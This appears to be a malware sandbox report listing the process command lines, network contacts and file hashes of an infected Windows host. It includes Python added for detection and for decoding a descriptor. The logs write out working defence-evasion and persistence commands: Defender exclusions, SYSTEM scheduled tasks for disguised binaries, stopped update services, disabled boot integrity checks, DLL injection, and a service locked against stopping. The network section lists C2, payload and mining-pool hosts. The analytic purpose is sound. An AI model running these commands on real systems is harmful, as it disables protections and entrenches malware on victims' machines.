C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231010204433.log C:\Windows\Logs\CBS\CbsPersist_20231010204433.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\22A.exe

C:\Users\Admin\AppData\Local\Temp\22A.exe

C:\Users\Admin\AppData\Local\Temp\129F.exe

C:\Users\Admin\AppData\Local\Temp\129F.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2708 -s 484

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=22A.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0

C:\Users\Admin\AppData\Local\Temp\1CAE.exe

C:\Users\Admin\AppData\Local\Temp\1CAE.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1588 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\taskeng.exe

taskeng.exe {E69C88C7-497A-4373-916E-0EE7071C8A6D} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1585636847461022073-1021634371-829412550-2552042784383148219734653501232614398"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1273765351-141908494011204511641458904720117405426117428168981964706015-328136547"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {582C031E-01DA-459F-879E-DAD6EDAADC53} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
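
Taken together, the command lines above are a compact chain of defence degradation and persistence: a Defender path exclusion covering the whole user profile and Program Files, a highest-run-level logon task named csrss that points at C:\Windows\rss\csrss.exe rather than System32, the Windows Update, BITS and delivery-optimisation services stopped (WaaSMedicSvc is the component that would normally repair that), sleep and hibernation timeouts zeroed so the host stays awake, and a SYSTEM-level startup task for a binary placed under a Chrome-like path. Each of these is individually noisy in process-creation telemetry, so a small rule set over command lines catches the chain early. The Python below is an added detection example, not code from the report or from the sandbox vendor: it runs such rules over constructed process-creation records whose command lines are copied from this section (the pids and the benign control record are made up) and produces a per-process rule list and a crude risk score.

```python
import re

# Constructed process-creation records. The command lines are the ones shown
# in this section; the pids and the benign control record at the end are made up.
EVENTS = [
    {"pid": 1001, "cmd": "powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"},
    {"pid": 1002, "cmd": r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F'},
    {"pid": 1003, "cmd": "cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc"},
    {"pid": 1004, "cmd": "cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -standby-timeout-ac 0"},
    {"pid": 1005, "cmd": "schtasks /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC "
                         "/tr \"'C:\\Program Files\\Google\\Chrome\\updater.exe'\""},
    {"pid": 1006, "cmd": "bcdedit -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1"},
    {"pid": 1007, "cmd": r"cmd.exe /c dir C:\Users\Admin"},   # benign control
]

SEVERITY = {"high": 3, "medium": 2, "low": 1}

# (rule name, severity, regex over the full command line). Patterns are
# case-insensitive because cmd.exe, sc and schtasks accept either case.
RULES = [
    ("defender_exclusion_added", "high",
     r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\b"),
    ("windows_update_services_stopped", "medium",
     r"\bsc(\.exe)?\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b"),
    ("sleep_and_hibernate_disabled", "low",
     r"\bpowercfg(\.exe)?\s+/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b"),
    ("logon_task_highest_runlevel", "medium",
     r"\bschtasks(\.exe)?\s+/create\b.*?/rl\s+highest\b"),
    ("task_runs_as_system", "medium",
     r"\bschtasks(\.exe)?\s+/create\b.*?/ru\s+'?System'?\b"),
    # A Windows core-process name in a directory other than System32/SysWOW64.
    ("system_binary_name_outside_system32", "high",
     r"\\(?!System32\\|SysWOW64\\)[^\\\"']+\\(csrss|lsass|smss|winlogon|svchost)\.exe\b"),
    ("bcd_integrity_checks_disabled", "high",
     r"\bbcdedit(\.exe)?\b.*?\bnointegritychecks\s+1\b"),
]
COMPILED = [(name, sev, re.compile(pat, re.IGNORECASE)) for name, sev, pat in RULES]


def detect(events):
    """Apply every rule to every command line; one hit per (pid, rule) match."""
    hits = []
    for ev in events:
        for name, sev, rx in COMPILED:
            if rx.search(ev["cmd"]):
                hits.append({"pid": ev["pid"], "rule": name, "severity": sev})
    return hits


def rules_by_pid(events):
    """Group hits so each process shows the set of rules it tripped."""
    grouped = {}
    for h in detect(events):
        grouped.setdefault(h["pid"], set()).add(h["rule"])
    return grouped


def risk_score(events):
    """Sum of severity weights over all hits; a quick triage number for the chain."""
    return sum(SEVERITY[h["severity"]] for h in detect(events))


if __name__ == "__main__":
    for pid, names in sorted(rules_by_pid(EVENTS).items()):
        print(pid, ", ".join(sorted(names)))
    print("risk score:", risk_score(EVENTS))
```

The records stand in for Sysmon event 1 or Security 4688 command-line fields; in production the same rules would be keyed on the parent process as well, since here the Defender exclusion and service stops are launched from a dropped executable rather than from an administrator's console. The weights are arbitrary and only serve to rank hosts when several trip at once.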

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
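
The sc sdset above rewrites the security descriptor of the dropped "WinDefender" service. Decoded, the allow ACE for Administrators (BA) grants query, reconfigure, start, delete, READ_CONTROL, WRITE_DAC and WRITE_OWNER but omits WP (SERVICE_STOP) and DT (SERVICE_PAUSE_CONTINUE), and a separate deny ACE for BA removes those two rights again; only Local System (SY) keeps SERVICE_STOP, and interactive and service-logon users get read-only control. The deny ACE sits after the allow ACE, which is non-canonical order, but the outcome is the same because the allow ACE never grants WP or DT in the first place. The SACL requests a failure audit for Everyone on every right, so a blocked `sc stop` from an admin leaves a trace. Because WRITE_DAC and SERVICE_CHANGE_CONFIG are still allowed to BA, the remediation route is to reset the descriptor with sc sdset (or disable the service and reboot), not to keep trying sc stop. The Python below is an added example, not part of the report: it parses the descriptor string from the command line above, expands each code to its service-object right, and evaluates the ordered DACL walk that AccessCheck performs for a single trustee alias (no group expansion, which is enough to show the effect on the built-in aliases used here).

```python
import re
from dataclasses import dataclass

# Service-object meaning of the two-letter SDDL access codes; sc sdset
# interprets the generic object codes this way for services.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
TRUSTEES = {"SY": "Local System", "BA": "Administrators", "IU": "Interactive users",
            "SU": "Service logon users", "WD": "Everyone"}
ACE_TYPES = {"A": "allow", "D": "deny", "AU": "audit"}

# Descriptor string from the sc sdset command line above.
SAMPLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


@dataclass
class Ace:
    ace_type: str        # A = allow, D = deny, AU = audit
    flags: str           # e.g. FA = audit failed access
    rights: frozenset    # two-letter codes
    trustee: str         # SID alias such as BA, or a literal S-1-... SID


def parse_ace(body):
    ace_type, flags, rights, _object_guid, _inherit_guid, trustee = body.split(";")
    codes = {rights} if rights.startswith("0x") else set(re.findall(r"[A-Z]{2}", rights))
    return Ace(ace_type, flags, frozenset(codes), trustee)


def parse_sddl(sddl):
    """Return (dacl, sacl) ACE lists in on-the-wire order; owner/group parts are skipped."""
    parts = {"D": [], "S": []}
    for m in re.finditer(r"([DS]):((?:\([^)]*\))*)", sddl):
        parts[m.group(1)] = [parse_ace(a) for a in re.findall(r"\(([^)]*)\)", m.group(2))]
    return parts["D"], parts["S"]


def describe(aces):
    """Human-readable line per ACE with the service-specific right names."""
    out = []
    for a in aces:
        names = ", ".join(SERVICE_RIGHTS.get(c, c) for c in sorted(a.rights))
        who = TRUSTEES.get(a.trustee, a.trustee)
        out.append(f"{ACE_TYPES.get(a.ace_type, a.ace_type):5} {who}: {names}")
    return out


def access_check(dacl, trustee, requested):
    """Ordered DACL walk as AccessCheck does it, for one trustee alias and no group
    expansion: allow ACEs strip rights from the request, a deny ACE that overlaps
    what is still outstanding ends the walk, and anything left over means no access."""
    remaining = set(requested)
    for ace in dacl:
        if ace.trustee != trustee:
            continue
        if ace.ace_type == "A":
            remaining -= ace.rights
            if not remaining:
                return True
        elif ace.ace_type == "D" and remaining & ace.rights:
            return False
    return not remaining


def deny_after_allow(dacl):
    """True when a deny ACE follows an allow ACE (non-canonical order)."""
    seen_allow = False
    for ace in dacl:
        if ace.ace_type == "A":
            seen_allow = True
        elif ace.ace_type == "D" and seen_allow:
            return True
    return False


def stop_control_matrix(sddl):
    """Which trustees named in the DACL can stop the service (SERVICE_STOP = WP)."""
    dacl, _ = parse_sddl(sddl)
    return {t: access_check(dacl, t, {"WP"}) for t in dict.fromkeys(a.trustee for a in dacl)}


if __name__ == "__main__":
    dacl, sacl = parse_sddl(SAMPLE_SDDL)
    print("\n".join(describe(dacl)))
    print("deny placed after allow:", deny_after_allow(dacl))
    print("can stop:", stop_control_matrix(SAMPLE_SDDL))
    print("BA can rewrite the DACL:", access_check(dacl, "BA", {"WD"}))
```

To compare against a real host, pull the descriptor with `sc sdshow <service>` and pass that string to parse_sddl; any service whose DACL denies WP to BA, or whose BA allow ACE lacks WP while a deny ACE exists, deserves the same scrutiny as this one. The walk here matches only the exact alias, so a token that holds Administrators through group membership is not modelled; for the built-in aliases that is sufficient, for arbitrary SIDs you would expand the token's groups first.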

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 194.169.175.127:80 host-host-file8.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
US 8.8.8.8:53 bytecloudasa.website udp
NL 85.209.176.171:80 85.209.176.171 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 api.ip.sb udp
US 8.8.8.8:53 62e2cb15-1fec-4f11-acb6-ed26c4d06b79.uuid.cdntokiog.studio udp
US 104.26.12.31:443 api.ip.sb tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 8.8.8.8:53 stun.ipfire.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 server14.cdntokiog.studio udp
DE 81.3.27.44:3478 stun.ipfire.org udp
US 162.159.130.233:443 cdn.discordapp.com tcp
BG 185.82.216.49:443 server14.cdntokiog.studio tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.97.0:443 walkinglate.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
FR 212.47.253.124:14433 xmr-eu1.nanopool.org tcp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

MD5 c268c396b0a43fb327966b84bb7a85e3
SHA1 88ef7629b07cdb0898d4c527074ac0b2257f7635
SHA256 9d8281522d4b63cffa01f617607c8000c94c4381ab4b1fa9f7f7d386efb32d7d
SHA512 f637c9ac797bbca1bd8684aa17197ed962ad290fe0512f010b257bae332f51b92ebb9a0f6adca3df74ee8cd3338e1a81ec851dd633fd14e7f35910e1d81ee7a1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

MD5 c268c396b0a43fb327966b84bb7a85e3
SHA1 88ef7629b07cdb0898d4c527074ac0b2257f7635
SHA256 9d8281522d4b63cffa01f617607c8000c94c4381ab4b1fa9f7f7d386efb32d7d
SHA512 f637c9ac797bbca1bd8684aa17197ed962ad290fe0512f010b257bae332f51b92ebb9a0f6adca3df74ee8cd3338e1a81ec851dd633fd14e7f35910e1d81ee7a1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

MD5 c268c396b0a43fb327966b84bb7a85e3
SHA1 88ef7629b07cdb0898d4c527074ac0b2257f7635
SHA256 9d8281522d4b63cffa01f617607c8000c94c4381ab4b1fa9f7f7d386efb32d7d
SHA512 f637c9ac797bbca1bd8684aa17197ed962ad290fe0512f010b257bae332f51b92ebb9a0f6adca3df74ee8cd3338e1a81ec851dd633fd14e7f35910e1d81ee7a1

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

MD5 c268c396b0a43fb327966b84bb7a85e3
SHA1 88ef7629b07cdb0898d4c527074ac0b2257f7635
SHA256 9d8281522d4b63cffa01f617607c8000c94c4381ab4b1fa9f7f7d386efb32d7d
SHA512 f637c9ac797bbca1bd8684aa17197ed962ad290fe0512f010b257bae332f51b92ebb9a0f6adca3df74ee8cd3338e1a81ec851dd633fd14e7f35910e1d81ee7a1

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

MD5 97e69a6510b539462ea0ae267b0ad4be
SHA1 5ad7587dfd8f5e2ed9820a3143df71c3ab7fa496
SHA256 a3872b2782bc7be1d66230baea590602cf4c8e8c75e695917d50e8dc8c6ed3b8
SHA512 9d38d33267df63078ad1d2435acdca5fb2c27c5aeeafb9916e28c385533d79a125c51e48675658a2babf30936c0a37da65575ad3958d856bb6bdbea2cdca4b3d

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

MD5 97e69a6510b539462ea0ae267b0ad4be
SHA1 5ad7587dfd8f5e2ed9820a3143df71c3ab7fa496
SHA256 a3872b2782bc7be1d66230baea590602cf4c8e8c75e695917d50e8dc8c6ed3b8
SHA512 9d38d33267df63078ad1d2435acdca5fb2c27c5aeeafb9916e28c385533d79a125c51e48675658a2babf30936c0a37da65575ad3958d856bb6bdbea2cdca4b3d

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

MD5 97e69a6510b539462ea0ae267b0ad4be
SHA1 5ad7587dfd8f5e2ed9820a3143df71c3ab7fa496
SHA256 a3872b2782bc7be1d66230baea590602cf4c8e8c75e695917d50e8dc8c6ed3b8
SHA512 9d38d33267df63078ad1d2435acdca5fb2c27c5aeeafb9916e28c385533d79a125c51e48675658a2babf30936c0a37da65575ad3958d856bb6bdbea2cdca4b3d

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

MD5 97e69a6510b539462ea0ae267b0ad4be
SHA1 5ad7587dfd8f5e2ed9820a3143df71c3ab7fa496
SHA256 a3872b2782bc7be1d66230baea590602cf4c8e8c75e695917d50e8dc8c6ed3b8
SHA512 9d38d33267df63078ad1d2435acdca5fb2c27c5aeeafb9916e28c385533d79a125c51e48675658a2babf30936c0a37da65575ad3958d856bb6bdbea2cdca4b3d

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

MD5 97e69a6510b539462ea0ae267b0ad4be
SHA1 5ad7587dfd8f5e2ed9820a3143df71c3ab7fa496
SHA256 a3872b2782bc7be1d66230baea590602cf4c8e8c75e695917d50e8dc8c6ed3b8
SHA512 9d38d33267df63078ad1d2435acdca5fb2c27c5aeeafb9916e28c385533d79a125c51e48675658a2babf30936c0a37da65575ad3958d856bb6bdbea2cdca4b3d

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

MD5 97e69a6510b539462ea0ae267b0ad4be
SHA1 5ad7587dfd8f5e2ed9820a3143df71c3ab7fa496
SHA256 a3872b2782bc7be1d66230baea590602cf4c8e8c75e695917d50e8dc8c6ed3b8
